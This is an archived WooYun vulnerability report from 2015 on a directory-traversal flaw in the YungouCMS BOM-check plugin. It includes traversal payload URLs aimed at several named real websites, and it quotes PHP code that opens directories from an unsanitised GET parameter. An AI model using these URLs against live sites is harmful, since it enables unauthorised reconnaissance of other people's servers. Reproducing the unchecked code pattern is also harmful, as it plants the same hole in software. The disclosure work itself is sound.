当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131234

漏洞标题:云购cms文件遍历漏洞

相关厂商:yungoucms.com

漏洞作者: 刘海哥

提交时间:2015-08-03 15:44

修复时间:2015-09-17 15:48

公开时间:2015-09-17 15:48

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-03: 细节已通知厂商并且等待厂商处理中
2015-08-03: 厂商已经确认,细节仅向厂商公开
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

随便看看..能送我一份程序?

详细说明:

system\plugin\bom\bom.plugin.php
http://www.yunyiba.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules
http://www.weizhonggou.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules
http://www.yyyg.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules
http://www.xia1027.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules
http://www.1yhlg.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules
http://www.1ybye.com/system/plugin/bom/bom.plugin.php?dir=../..//../
http://www.ykuaimai.com/system/plugin/bom/bom.plugin.php?dir=../..//.../

漏洞证明:

if(isset($_GET['dir'])){
		$basedir=$_GET['dir'];
	}else{
		$basedir=".";
	}
	
	//是否自动移除发现的BOM信息。1为是,0为否。
	if(isset($_GET['auto'])){
		$auto=0;
	}else{
		$auto=1;
	}
 
 
    if ($dh = opendir($basedir)) {
		while (($file = readdir($dh)) !== false) {
			if ($file!='.' && $file!='..' && !is_dir($basedir."/".$file)){
				echo "filename: $file ".checkBOM("$basedir/$file")." <br>";
			}
			if ($file!='.' && $file!='..' && is_dir($basedir."/".$file)){
				echo "<a href='?dir=".$basedir."/".$file."'>".$basedir."/".$file."</a><br>";
			}
		}
	
		closedir($dh);
    }

修复方案:

版权声明:转载请注明来源 刘海哥@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-08-03 15:46

厂商回复:

检测BOM用的,有些人没有删除

最新状态:

暂无